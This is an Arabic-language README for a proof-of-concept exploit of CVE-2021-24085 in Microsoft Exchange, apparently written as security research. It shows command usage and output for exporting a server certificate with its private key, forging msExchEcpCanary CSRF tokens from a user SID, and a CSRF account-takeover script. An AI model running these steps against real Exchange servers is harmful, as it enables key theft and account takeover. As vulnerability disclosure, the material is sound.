
هذا برهان مفهوم لـ CVE-2021-24085.
poc.py بتنزيل ملف شهادة الهدف مع المفتاح الخاص بداخلهYellowCanary بتوليد رمز msExchEcpCanary المميز لـ csrf لمستخدم معين استنادًا إلى SIDpoc.js هو استغلال csrf لتفعيل الاستيلاء على حسابلم أقدم ملف malicifest.xml ولكن يمكنك العثور على معلومات حول كيفية إنشاء ملف manifest خبيث من الموارد المتاحة في قسم المراجع أدناه.
الوصول إلى الشهادة مع المفتاح الخاص بداخلها:
researcher@srcincite:~$ ./poc.py
(+) usage: ./poc.py <target> <user:pass>
(+) eg: ./poc.py 192.168.75.142 [email protected]:user123###
researcher@srcincite:~$ ./poc.py 192.168.75.142 [email protected]:user123###
(+) found the thumbprint: F4EB6AADB8D7C0D12E756BA2E28F90CCACD41299
(+) exported the cert to the target filesystem
(+) saved the cert to testcert.der using password: hax
يمكنك الآن توليد رموز csrf باستخدام YellowCanary عبر SID المستخدم الهدف:
c:\Users\researcher>poc.exe S-1-5-21-257332918-392067043-4020791575-3104 testcert.der hax
#====================================================
# YellowCanary - generate msExchEcpCanary csrf tokens
#====================================================
security identifier : S-1-5-21-257332918-392067043-4020791575-3104
msExchEcpCanary : sA0o0nS_C0G_PMdcA_dAd5BdAEL_-NcYhndaAwlhBJFs4a4iKy4sn53azH-O5Ix3F0jnwzZZUsk.